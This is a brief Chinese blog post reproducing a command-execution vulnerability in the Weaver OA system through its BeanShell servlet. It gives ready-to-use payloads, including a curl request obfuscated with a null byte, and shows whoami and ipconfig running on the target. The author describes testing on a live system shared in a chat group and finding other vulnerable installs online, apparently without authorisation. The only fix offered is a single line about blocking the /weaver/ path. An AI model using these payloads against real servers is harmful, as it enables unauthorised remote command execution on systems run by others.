泛微OA系统漏洞复现
0x00 前言
最近泛微OA系统爆发出0day漏洞,通杀<=9.0的系统,本次复现一下漏洞
0x01 复现
昨天群里面大佬发了一个泛微OA系统的连接,本来作为本次复现的一个环境
漏洞地址:/weaver/bsh.servlet.BshServlet/
漏洞页面如下
poc:exec("whoami"); |
直接执行了whoami命令
执行ipconfig命令
在土司看见大佬们其他的poc
bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw |
curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw' |
这个poc暂时没用过,根据关键字在网上找了一下泛微的OA系统,小部分可以直接执行命令,是一个危害挺大的漏洞。
0x02 漏洞修复
1、屏蔽/weaver/*目录的访问;
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Time'Blog!
评论